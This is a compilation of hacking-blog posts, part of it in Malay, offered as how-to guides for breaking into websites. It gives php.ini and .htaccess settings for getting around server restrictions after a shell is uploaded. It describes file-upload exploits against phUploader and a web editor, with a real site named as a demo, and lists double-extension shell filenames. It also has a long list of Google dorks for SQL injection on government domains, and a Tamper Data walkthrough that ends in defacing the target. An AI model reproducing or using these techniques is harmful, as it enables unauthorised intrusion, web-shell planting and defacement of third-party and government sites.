Macam ni :





Mesti bengang gila la hahaha..ok jangan risau jom aku ajar cara nak bypass :)

1. Mula-mula buat satu file php.ini .
Copy code dibawah :


safe_mode=OFF
disable_functions=NONE
Lepas tu paste dalam notepad dan save as

name : php.ini
File type : all file


2. Kemudian kita buat file .htaccess .
Copy code dibawah :

Options FollowSymLinks MultiViews Indexes ExecCGIPaste dalam notepad dan save as
name : .htaccess
File type : all file

3. Seterusnya korang cuma perlu upload ke dalam directory yang ada file config symlink korang tadi.Upload guna shell la xD
Dengan ini symlink korang akan di-bypass :D

Kalau tak berjaya, upload dekat directory public_html

Itu saja step dia...senang kan? selamat berjaya

Sunday 3 March 2013

phUploader Remote File Upload Vulnerability

Google Dork : intitle:Powered By phUploader

Go to Google.com and enter this DOrk, see serach results
Exploit URL :
http://{site.comt}/ path/upload.php
 or
http://site.com/upload.php

select any website and upload your file there
website allow to upload .jpg .png .gif anf .png files only
anyway you can upload your deface in .jpg and mirrOr website like
zone-h accept it as defcaement, if want to upload a shell then upload as
shell.php.jpg
after uploading your file you'll got a message
Your file(s) have been uploaded!

see the Link Below this message For view Your uploaded File

Live Demo ~ http://humortshirtzone.com/phUploader.php
Uploaded File ~ http://www.humortshirtzone.com/uploads/1321616908.jpg
- See more at: http://cehtrick.blogspot.com/2013/01/phuploader-remote-file-upload.html#sthash.neWQhKKn.dpuf

Image Upload Vulnerabilities

Image Upload Vulnerabilities
Dork: inurl:/editor/tmedit/popups
Exploit Path : /editor/tmedit/popups/InsertFile/insert_file.php

There You Can Upload Shell As Image.
Then Your Shell link Will’be like http://vulnrablesite.com/images/yourfilehere
 Find Different Directories To Find Out Your Shell :)
ASP Shell Upload How To Hack ASP Sites. First You Need To Find The Website Upload Path to Upload Shell.For That Use Google Dorks. Google Dorks:




You Can Use "allinurl" Instead of "Inurl" In Google Dorks.
Shell Format: Formats:
 shell.asp;me.jpg
shell.asp
shell.asp.jpg
shell.asp.jpg - See more at: http://www.defencexposure.com/2012/06/image-upload-vulnerabilities.html#sthash.nHaZTWeu.dpuf

sql vuln gov


inurl:index.php?id= site:*gov.pl
inurl:index.php?id= site:*gov
inurl:news.php?id= site:*gov.af
inurl:oferta.php?id= site:*gov.af
inurl:trainers.php?id= site:*gov.pl
inurl:article.php?ID= site:*gov.uk
inurl:play_old.php?id= site:*gov.au
inurl:declaration_more.php?decl_id= site:*gov.in
inurl:Pageid= site:*gov
inurl:pagina.php?left= site:*.gov.au
inurl:layout.php?id=120'= site:*gov.pl
inurl:principal.php?id=123'= site:*gov.uk
inurl:standard.php?base_dir= site:*gov
inurl:home.php?where= site:*gov.pl
inurl:page.php?sivu= site:*.pl
inurl:*inc*.php?adresa= site:*gov
inurl:padrao.php?str= site:*gov
inurl:include.php?my= site:*.gov.af
inurl:show.php?home= site:*gov.br
inurl:index.php?lid=20= site:*gov.au 
inurl:principal.php?id=30= site:*gov
inurl:file.php?id=205= site:*gov.au
inurl:info.php?id=25155= site:*gov.af
inurl:enter.php?id=203= site:*gov.uk
inurl:general.php?id=50= site:*gov
inurl:principal.php?id=705= site:*gov.za
inurl:standard.php?id=303= site:*.gov.ie
nurl:nota.php?v= site:*gov.bc.ca
inurl:home.php?str= site:*ed.gov
inurl:press.php?panel= site:*gov.mu
inurl:page.php?mod= site:*gov
inurl:default.php?param= site:*gov
inurl:down*.php?texto= site:*go.af
inurl:mod*.php?dir= site:*gov.ie
inurl:view.php?where= site:*gov.za
inurl:blank.php?subject= site:*gov.br
inurl:path.php?play= site:*gov.uk
inurl:base.php?l= site:*gov.au
CATEGORIES: 
- See more at: http://voice0fblackhat.blogspot.com/2012/01/sqli-dork-for-gov.html#sthash.owINqw1u.dpuf

Shell Upload Via Tamper Data

Hello Hackerz!!

Sometimes You're In Trouble Of Uploading Shell In The Server With The "shell.php" Format. So Here's The Solution.



Let's Have A Look. 
At First  Install Add-on "Tamper Data" In Mozilla Firefox. Go Here For Tamper Data.



Now Change The Shell Name Into ".jpg Format" Like This,



shell.php;.jpg
shell.php.jpg
shell.php..jpg
shell.php.jpg
shell.php.jpg:;
shell.php.jpg%;
shell.php.jpg;
shell.php.jpg;
shell.php.jpg:;


Now Go To The Uploader URL. Let The Uploader URL:

http://www.targetsite.com/upload.php




Now Select Your Shel In The Above format But To Select The Upload Button. Because Before That You've To Configure Tamper Data. Open Tamper Data From Mozilla.

Firefox > Tools > Tamper Data.

So Let's Have A Look:

  




Now You've To Click "Start Tamper" From Tamper Data Window And Start Tampering. Before Tampering Close All Other Tabs.

Now Click Upload Button From Your Target Site To Upload Your Shell.

Now You should Get Tamper Request With Your Target Site. Click Tamper.



 Now You Should Get "Tamper Popup" Window. From Here You've To Change Your Shell Format Into  ".php".








At The Right Side Have A Look At "Post Parameter Value" Section And Find Your Shell Name. Change It Like "shell.php" And Press Ok.

Great!!

Now Submit.

All Is Done.

Now Got To Your Shell And Deface It :D :D
- See more at: http://www.defencexposure.com/2013/01/shell-upload-via-tamper-data.html#sthash.tIzbXV3l.dpuf